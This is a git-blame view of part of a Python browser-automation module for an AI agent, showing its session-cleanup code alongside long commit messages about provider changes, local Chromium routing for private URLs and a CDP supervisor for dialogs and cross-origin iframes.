needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
if _is_camofox_mode ( ) :
try :
2026-04-08 13:44:58 -07:00
from tools . browser_camofox import camofox_close , camofox_soft_cleanup
if not camofox_soft_cleanup ( task_id ) :
camofox_close ( task_id )
refactor: remove browser_close tool — auto-cleanup handles it (#5792)
* refactor: remove browser_close tool — auto-cleanup handles it
The browser_close tool was called in only 9% of browser sessions (13/144
navigations across 66 sessions), always redundantly — cleanup_browser()
already runs via _cleanup_task_resources() at conversation end, and the
background inactivity reaper catches anything else.
Removing it saves one tool schema slot in every browser-enabled API call.
Also fixes a latent bug: cleanup_browser() now handles Camofox sessions
too (previously only Browserbase). Camofox sessions were never auto-cleaned
per-task because they live in a separate dict from _active_sessions.
Files changed (13):
- tools/browser_tool.py: remove function, schema, registry entry; add
camofox cleanup to cleanup_browser()
- toolsets.py, model_tools.py, prompt_builder.py, display.py,
acp_adapter/tools.py: remove browser_close from all tool lists
- tests/: remove browser_close test, update toolset assertion
- docs/skills: remove all browser_close references
* fix: repeat browser_scroll 5x per call for meaningful page movement
Most backends scroll ~100px per call — barely visible on a typical
viewport. Repeating 5x gives ~500px (~half a viewport), making each
scroll tool call actually useful.
Backend-agnostic approach: works across all 7+ browser backends without
needing to configure each one's scroll amount individually. Breaks
early on error for the agent-browser path.
* feat: auto-return compact snapshot from browser_navigate
Every browser session starts with navigate → snapshot. Now navigate
returns the compact accessibility tree snapshot inline, saving one
tool call per browser task.
The snapshot captures the full page DOM (not viewport-limited), so
scroll position doesn't affect it. browser_snapshot remains available
for refreshing after interactions or getting full=true content.
Both Browserbase and Camofox paths auto-snapshot. If the snapshot
fails for any reason, navigation still succeeds — the snapshot is
a bonus, not a requirement.
Schema descriptions updated to guide models: navigate mentions it
returns a snapshot, snapshot mentions it's for refresh/full content.
* refactor: slim cronjob tool schema — consolidate model/provider, drop unused params
Session data (151 calls across 67 sessions) showed several schema
properties were never used by models. Consolidated and cleaned up:
Removed from schema (still work via backend/CLI):
- skill (singular): use skills array instead
- reason: pause-only, unnecessary
- include_disabled: now defaults to true
- base_url: extreme edge case, zero usage
- provider (standalone): merged into model object
Consolidated:
- model + provider → single 'model' object with {model, provider} fields.
If provider is omitted, the current main provider is pinned at creation
time so the job stays stable even if the user changes their default.
Kept:
- script: useful data collection feature
- skills array: standard interface for skill loading
Schema shrinks from 14 to 10 properties. All backend functionality
preserved — the Python function signature and handler lambda still
accept every parameter.
* fix: remove mixture_of_agents from core toolsets — opt-in only via hermes tools
MoA was in _HERMES_CORE_TOOLS and composite toolsets (hermes-cli,
hermes-messaging, safe), which meant it appeared in every session
for anyone with OPENROUTER_API_KEY set. The _DEFAULT_OFF_TOOLSETS
gate only works after running 'hermes tools' explicitly.
Now MoA only appears when a user explicitly enables it via
'hermes tools'. The moa toolset definition and check_fn remain
unchanged — it just needs to be opted into.
2026-04-07 03:28:44 -07:00
except Exception as e :
logger . debug ( " Camofox cleanup for task %s : %s " , task_id , e )
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
2026-02-21 03:11:11 -08:00
logger . debug ( " cleanup_browser called for task_id: %s " , task_id )
logger . debug ( " Active sessions: %s " , list ( _active_sessions . keys ( ) ) )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-02-21 00:44:25 -08:00
# Check if session exists (under lock), but don't remove yet -
# _run_browser_command needs it to build the close command.
with _cleanup_lock :
session_info = _active_sessions . get ( task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-02-21 00:44:25 -08:00
if session_info :
2026-01-29 06:10:24 +00:00
bb_session_id = session_info . get ( " bb_session_id " , " unknown " )
2026-03-14 11:34:31 -07:00
logger . debug ( " Found session for task %s : bb_session_id= %s " , task_id , bb_session_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
feat: browser console/errors tool, annotated screenshots, auto-recording, and dogfood QA skill
New browser capabilities and a built-in skill for agent-driven web QA.
## New tool: browser_console
Returns console messages (log/warn/error/info) AND uncaught JavaScript
exceptions in a single call. Uses agent-browser's 'console' and 'errors'
commands through the existing session plumbing. Supports --clear to reset
buffers. Verified working in both local and Browserbase cloud modes.
## Enhanced tool: browser_vision(annotate=True)
New boolean parameter on browser_vision. When true, agent-browser overlays
numbered [N] labels on interactive elements — each [N] maps to ref @eN.
Annotation data (element name, role, bounding box) returned alongside the
vision analysis. Useful for QA reports and spatial reasoning.
## Config: browser.record_sessions
Auto-record browser sessions as WebM video files when enabled:
- Starts recording on first browser_navigate
- Stops and saves on browser_close
- Saves to ~/.hermes/browser_recordings/
- Works in both local and cloud modes (verified)
- Disabled by default
## Built-in skill: dogfood
Systematic exploratory QA testing for web applications. Teaches the agent
a 5-phase workflow:
1. Plan — accept URL, create output dirs, set scope
2. Explore — systematic crawl with annotated screenshots
3. Collect Evidence — screenshots, console errors, JS exceptions
4. Categorize — severity (Critical/High/Medium/Low) and category
(Functional/Visual/Accessibility/Console/UX/Content)
5. Report — structured markdown with per-issue evidence
Includes:
- skills/dogfood/SKILL.md — full workflow instructions
- skills/dogfood/references/issue-taxonomy.md — severity/category defs
- skills/dogfood/templates/dogfood-report-template.md — report template
## Tests
21 new tests covering:
- browser_console message/error parsing, clear flag, empty/failed states
- browser_console schema registration
- browser_vision annotate schema and flag passing
- record_sessions config defaults and recording lifecycle
- Dogfood skill file existence and content validation
Addresses #315.
2026-03-08 21:02:14 -07:00
# Stop auto-recording before closing (saves the file)
_maybe_stop_recording ( task_id )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-02-21 00:44:25 -08:00
# Try to close via agent-browser first (needs session in _active_sessions)
2026-01-29 06:10:24 +00:00
try :
_run_browser_command ( task_id , " close " , [ ] , timeout = 10 )
2026-03-14 11:34:31 -07:00
logger . debug ( " agent-browser close command completed for task %s " , task_id )
2026-01-29 06:10:24 +00:00
except Exception as e :
2026-03-14 11:34:31 -07:00
logger . warning ( " agent-browser close failed for task %s : %s " , task_id , e )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
2026-02-21 00:44:25 -08:00
# Now remove from tracking under lock
with _cleanup_lock :
_active_sessions . pop ( task_id , None )
_session_last_activity . pop ( task_id , None )
feat(browser): auto-spawn local Chromium for LAN/localhost URLs in cloud mode (#16136)
When a cloud browser provider (Browserbase / Browser-Use / Firecrawl) is
configured, browser_navigate now transparently spawns a local Chromium
sidecar for URLs whose host resolves to a private/loopback/LAN address
(localhost, 127.0.0.1, 192.168.x.x, 10.x.x.x, *.local, *.lan, *.internal,
::1, 169.254.x.x). Public URLs continue to use the cloud provider in the
same conversation.
Previously, setting BROWSERBASE_API_KEY / cloud_provider: browserbase
pinned the whole tool to cloud for the process — localhost URLs were
either SSRF-blocked (default) or sent to Browserbase (where they 404'd
because the cloud can't reach your LAN). Users who wanted 'cloud for
public, local for localhost' had no way to express it short of toggling
providers mid-session.
Implementation uses a composite session key scheme: the bare task_id
serves the cloud session, and a '{task_id}::local' sidecar serves the
local Chromium. _last_active_session_key[task_id] tracks which of the
two served the most recent nav so snapshot/click/fill/etc. hit the
correct one. cleanup_browser(bare_task_id) reaps both.
Feature is on by default. Opt out via:
browser:
auto_local_for_private_urls: false
The cloud provider never sees private URLs. Post-redirect SSRF guard
is preserved: redirects from public onto private addresses still block.
2026-04-26 09:57:58 -07:00
# Cloud mode: close the cloud browser session via provider API.
# Local sidecars have bb_session_id=None so this no-ops for them.
2026-03-17 00:16:34 -07:00
if bb_session_id :
provider = _get_cloud_provider ( )
if provider is not None :
try :
provider . close_session ( bb_session_id )
except Exception as e :
logger . warning ( " Could not close cloud browser session: %s " , e )
2026-03-14 11:34:31 -07:00
2026-02-21 00:44:25 -08:00
# Kill the daemon process and clean up socket directory
2026-02-09 04:35:25 +00:00
session_name = session_info . get ( " session_name " , " " )
if session_name :
2026-03-14 11:34:31 -07:00
socket_dir = os . path . join ( _socket_safe_tmpdir ( ) , f " agent-browser- { session_name } " )
2026-02-09 04:35:25 +00:00
if os . path . exists ( socket_dir ) :
2026-02-21 00:44:25 -08:00
# agent-browser writes {session}.pid in the socket dir
pid_file = os . path . join ( socket_dir , f " { session_name } .pid " )
if os . path . isfile ( pid_file ) :
try :
2026-03-08 22:39:17 +03:00
daemon_pid = int ( Path ( pid_file ) . read_text ( ) . strip ( ) )
2026-02-21 00:44:25 -08:00
os . kill ( daemon_pid , signal . SIGTERM )
2026-03-14 11:34:31 -07:00
logger . debug ( " Killed daemon pid %s for %s " , daemon_pid , session_name )
2026-02-21 00:44:25 -08:00
except ( ProcessLookupError , ValueError , PermissionError , OSError ) :
2026-03-14 11:34:31 -07:00
logger . debug ( " Could not kill daemon pid for %s (already dead or inaccessible) " , session_name )
2026-02-09 04:35:25 +00:00
shutil . rmtree ( socket_dir , ignore_errors = True )
2026-03-14 11:34:31 -07:00
2026-02-21 03:11:11 -08:00
logger . debug ( " Removed task %s from active sessions " , task_id )
else :
logger . debug ( " No active session found for task_id: %s " , task_id )
2026-01-29 06:10:24 +00:00
def cleanup_all_browsers ( ) - > None :
"""
Clean up all active browser sessions .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Useful for cleanup on shutdown .
"""
2026-01-31 21:42:15 -08:00
with _cleanup_lock :
2026-02-21 00:44:25 -08:00
task_ids = list ( _active_sessions . keys ( ) )
for task_id in task_ids :
cleanup_browser ( task_id )
2026-01-29 06:10:24 +00:00
feat(browser): CDP supervisor — dialog detection + response + cross-origin iframe eval (#14540)
* docs: browser CDP supervisor design (for upcoming PR)
Design doc ahead of implementation — dialog + iframe detection/interaction
via a persistent CDP supervisor. Covers backend capability matrix (verified
live 2026-04-23), architecture, lifecycle, policy, agent surface, PR split,
non-goals, and test plan.
Supersedes #12550.
No code changes in this commit.
* feat(browser): add persistent CDP supervisor for dialog + frame detection
Single persistent CDP WebSocket per Hermes task_id that subscribes to
Page/Runtime/Target events and maintains thread-safe state for pending
dialogs, frame tree, and console errors.
Supervisor lives in its own daemon thread running an asyncio loop;
external callers use sync API (snapshot(), respond_to_dialog()) that
bridges onto the loop.
Auto-attaches to OOPIF child targets via Target.setAutoAttach{flatten:true}
and enables Page+Runtime on each so iframe-origin dialogs surface through
the same supervisor.
Dialog policies: must_respond (default, 300s safety timeout),
auto_dismiss, auto_accept.
Frame tree capped at 30 entries + OOPIF depth 2 to keep snapshot
payloads bounded on ad-heavy pages.
E2E verified against real Chrome via smoke test — detects + responds
to main-frame alerts, iframe-contentWindow alerts, preserves frame
tree, graceful no-dialog error path, clean shutdown.
No agent-facing tool wiring in this commit (comes next).
* feat(browser): add browser_dialog tool wired to CDP supervisor
Agent-facing response-only tool. Schema:
action: 'accept' | 'dismiss' (required)
prompt_text: response for prompt() dialogs (optional)
dialog_id: disambiguate when multiple dialogs queued (optional)
Handler:
SUPERVISOR_REGISTRY.get(task_id).respond_to_dialog(...)
check_fn shares _browser_cdp_check with browser_cdp so both surface and
hide together. When no supervisor is attached (Camofox, default
Playwright, or no browser session started yet), tool is hidden; if
somehow invoked it returns a clear error pointing the agent to
browser_navigate / /browser connect.
Registered in _HERMES_CORE_TOOLS and the browser / hermes-acp /
hermes-api-server toolsets alongside browser_cdp.
* feat(browser): wire CDP supervisor into session lifecycle + browser_snapshot
Supervisor lifecycle:
* _get_session_info lazy-starts the supervisor after a session row is
materialized — covers every backend code path (Browserbase, cdp_url
override, /browser connect, future providers) with one hook.
* cleanup_browser(task_id) stops the supervisor for that task first
(before the backend tears down CDP).
* cleanup_all_browsers() calls SUPERVISOR_REGISTRY.stop_all().
* /browser connect eagerly starts the supervisor for task 'default'
so the first snapshot already shows pending_dialogs.
* /browser disconnect stops the supervisor.
CDP URL resolution for the supervisor:
1. BROWSER_CDP_URL / browser.cdp_url override.
2. Fallback: session_info['cdp_url'] from cloud providers (Browserbase).
browser_snapshot merges supervisor state (pending_dialogs + frame_tree)
into its JSON output when a supervisor is active — the agent reads
pending_dialogs from the snapshot it already requests, then calls
browser_dialog to respond. No extra tool surface.
Config defaults:
* browser.dialog_policy: 'must_respond' (new)
* browser.dialog_timeout_s: 300 (new)
No version bump — new keys deep-merge into existing browser section.
Deadlock fix in supervisor event dispatch:
* _on_dialog_opening and _on_target_attached used to await CDP calls
while the reader was still processing an event — but only the reader
can set the response Future, so the call timed out.
* Both now fire asyncio.create_task(...) so the reader stays pumping.
* auto_dismiss/auto_accept now actually close the dialog immediately.
Tests (tests/tools/test_browser_supervisor.py, 11 tests, real Chrome):
* supervisor start/snapshot
* main-frame alert detection + dismiss
* iframe.contentWindow alert
* prompt() with prompt_text reply
* respond with no pending dialog -> clean error
* auto_dismiss clears on event
* registry idempotency
* registry stop -> snapshot reports inactive
* browser_dialog tool no-supervisor error
* browser_dialog invalid action
* browser_dialog end-to-end via tool handler
xdist-safe: chrome_cdp fixture uses a per-worker port.
Skipped when google-chrome/chromium isn't installed.
* docs(browser): document browser_dialog tool + CDP supervisor
- user-guide/features/browser.md: new browser_dialog section with
workflow, availability gate, and dialog_policy table
- reference/tools-reference.md: row for browser_dialog, tool count
bumped 53 -> 54, browser tools count 11 -> 12
- reference/toolsets-reference.md: browser_dialog added to browser
toolset row with note on pending_dialogs / frame_tree snapshot fields
Full design doc lives at
developer-guide/browser-supervisor.md (committed earlier).
* fix(browser): reconnect loop + recent_dialogs for Browserbase visibility
Found via Browserbase E2E test that revealed two production-critical issues:
1. **Supervisor WebSocket drops when other clients disconnect.** Browserbase's
CDP proxy tears down our long-lived WebSocket whenever a short-lived
client (e.g. agent-browser CLI's per-command CDP connection) disconnects.
Fixed with a reconnecting _run loop that re-attaches with exponential
backoff on drops. _page_session_id and _child_sessions are reset on each
reconnect; pending_dialogs and frames are preserved across reconnects.
2. **Browserbase auto-dismisses dialogs server-side within ~10ms.** Their
Playwright-based CDP proxy dismisses alert/confirm/prompt before our
Page.handleJavaScriptDialog call can respond. So pending_dialogs is
empty by the time the agent reads a snapshot on Browserbase.
Added a recent_dialogs ring buffer (capacity 20) that retains a
DialogRecord for every dialog that opened, with a closed_by tag:
* 'agent' — agent called browser_dialog
* 'auto_policy' — local auto_dismiss/auto_accept fired
* 'watchdog' — must_respond timeout auto-dismissed (300s default)
* 'remote' — browser/backend closed it on us (Browserbase)
Agents on Browserbase now see the dialog history with closed_by='remote'
so they at least know a dialog fired, even though they couldn't respond.
3. **Page.javascriptDialogClosed matching bug.** The event doesn't include a
'message' field (CDP spec has only 'result' and 'userInput') but our
_on_dialog_closed was matching on message. Fixed to match by session_id
+ oldest-first, with a safety assumption that only one dialog is in
flight per session (the JS thread is blocked while a dialog is up).
Docs + tests updated:
* browser.md: new availability matrix showing the three backends and
which mode (pending / recent / response) each supports
* developer-guide/browser-supervisor.md: three-field snapshot schema
with closed_by semantics
* test_browser_supervisor.py: +test_recent_dialogs_ring_buffer (12/12
passing against real Chrome)
E2E verified both backends:
* Local Chrome via /browser connect: detect + respond full workflow
(smoke_supervisor.py all 7 scenarios pass)
* Browserbase: detect via recent_dialogs with closed_by='remote'
(smoke_supervisor_browserbase_v2.py passes)
Camofox remains out of scope (REST-only, no CDP) — tracked for
upstream PR 3.
* feat(browser): XHR bridge for dialog response on Browserbase (FIXED)
Browserbase's CDP proxy auto-dismisses native JS dialogs within ~10ms, so
Page.handleJavaScriptDialog calls lose the race. Solution: bypass native
dialogs entirely.
The supervisor now injects Page.addScriptToEvaluateOnNewDocument with a
JavaScript override for window.alert/confirm/prompt. Those overrides
perform a synchronous XMLHttpRequest to a magic host
('hermes-dialog-bridge.invalid'). We intercept those XHRs via Fetch.enable
with a requestStage=Request pattern.
Flow when a page calls alert('hi'):
1. window.alert override intercepts, builds XHR GET to
http://hermes-dialog-bridge.invalid/?kind=alert&message=hi
2. Sync XHR blocks the page's JS thread (mirrors real dialog semantics)
3. Fetch.requestPaused fires on our WebSocket; supervisor surfaces
it as a pending dialog with bridge_request_id set
4. Agent reads pending_dialogs from browser_snapshot, calls browser_dialog
5. Supervisor calls Fetch.fulfillRequest with JSON body:
{accept: true|false, prompt_text: '...', dialog_id: 'd-N'}
6. The injected script parses the body, returns the appropriate value
from the override (undefined for alert, bool for confirm, string|null
for prompt)
This works identically on Browserbase AND local Chrome — no native dialog
ever fires, so Browserbase's auto-dismiss has nothing to race. Dialog
policies (must_respond / auto_dismiss / auto_accept) all still work.
Bridge is installed on every attached session (main page + OOPIF child
sessions) so iframe dialogs are captured too.
Native-dialog path kept as a fallback for backends that don't auto-dismiss
(so a page that somehow bypasses our override — e.g. iframes that load
after Fetch.enable but before the init-script runs — still gets observed
via Page.javascriptDialogOpening).
E2E VERIFIED:
* Local Chrome: 13/13 pytest tests green (12 original + new
test_bridge_captures_prompt_and_returns_reply_text that asserts
window.__ret === 'AGENT-SUPPLIED-REPLY' after agent responds)
* Browserbase: smoke_bb_bridge_v2.py runs 4/4 PASS:
- alert('BB-ALERT-MSG') dismiss → page.alert_ret = undefined ✓
- prompt('BB-PROMPT-MSG', 'default-xyz') accept with 'AGENT-REPLY'
→ page.prompt_ret === 'AGENT-REPLY' ✓
- confirm('BB-CONFIRM-MSG') accept → page.confirm_ret === true ✓
- confirm('BB-CONFIRM-MSG') dismiss → page.confirm_ret === false ✓
Docs updated in browser.md and developer-guide/browser-supervisor.md —
availability matrix now shows Browserbase at full parity with local
Chrome for both detection and response.
* feat(browser): cross-origin iframe interaction via browser_cdp(frame_id=...)
Adds iframe interaction to the CDP supervisor PR (was queued as PR 2).
Design: browser_cdp gets an optional frame_id parameter. When set, the
tool looks up the frame in the supervisor's frame_tree, grabs its child
cdp_session_id (OOPIF session), and dispatches the CDP call through the
supervisor's already-connected WebSocket via run_coroutine_threadsafe.
Why not stateless: on Browserbase, each fresh browser_cdp WebSocket
must re-negotiate against a signed connectUrl. The session info carries
a specific URL that can expire while the supervisor's long-lived
connection stays valid. Routing via the supervisor sidesteps this.
Agent workflow:
1. browser_snapshot → frame_tree.children[] shows OOPIFs with is_oopif=true
2. browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF frame_id>,
params={'expression': 'document.title', 'returnByValue': True})
3. Supervisor dispatches the call on the OOPIF's child session
Supervisor state fixes needed along the way:
* _on_frame_detached now skips reason='swap' (frame migrating processes)
* _on_frame_detached also skips when the frame is an OOPIF with a live
child session — Browserbase fires spurious remove events when a
same-origin iframe gets promoted to OOPIF
* _on_target_detached clears cdp_session_id but KEEPS the frame record
so the agent still sees the OOPIF in frame_tree during transient
session flaps
E2E VERIFIED on Browserbase (smoke_bb_iframe_agent_path.py):
browser_cdp(method='Runtime.evaluate',
params={'expression': 'document.title', 'returnByValue': True},
frame_id=<OOPIF>)
→ {'success': True, 'result': {'value': 'Example Domain'}}
The iframe is <iframe src='https://example.com/'> inside a top-level
data: URL page on a real Browserbase session. The agent Runtime.evaluates
INSIDE the cross-origin iframe and gets example.com's title back.
Tests (tests/tools/test_browser_supervisor.py — 16 pass total):
* test_browser_cdp_frame_id_routes_via_supervisor — injects fake OOPIF,
verifies routing via supervisor, Runtime.evaluate returns 1+1=2
* test_browser_cdp_frame_id_missing_supervisor — clean error when no
supervisor attached
* test_browser_cdp_frame_id_not_in_frame_tree — clean error on bad
frame_id
Docs (browser.md and developer-guide/browser-supervisor.md) updated with
the iframe workflow, availability matrix now shows OOPIF eval as shipped
for local Chrome + Browserbase.
* test(browser): real-OOPIF E2E verified manually + chrome_cdp uses --site-per-process
When asked 'did you test the iframe stuff' I had only done a mocked
pytest (fake injected OOPIF) plus a Browserbase E2E. Closed the
local-Chrome real-OOPIF gap by writing /tmp/dialog-iframe-test/
smoke_local_oopif.py:
* 2 http servers on different hostnames (localhost:18905 + 127.0.0.1:18906)
* Chrome with --site-per-process so the cross-origin iframe becomes a
real OOPIF in its own process
* Navigate, find OOPIF in supervisor.frame_tree, call
browser_cdp(method='Runtime.evaluate', frame_id=<OOPIF>) which routes
through the supervisor's child session
* Asserts iframe document.title === 'INNER-FRAME-XYZ' (from the
inner page, retrieved via OOPIF eval)
PASSED on 2026-04-23.
Tried to embed this as a pytest but hit an asyncio version quirk between
venv (3.11) and the system python (3.13) — Page.navigate hangs in the
pytest harness but works in standalone. Left a self-documenting skip
test that points to the smoke script + describes the verification.
chrome_cdp fixture now passes --site-per-process so future iframe tests
can rely on OOPIF behavior.
Result: 16 pass + 1 documented-skip = 17 tests in
tests/tools/test_browser_supervisor.py.
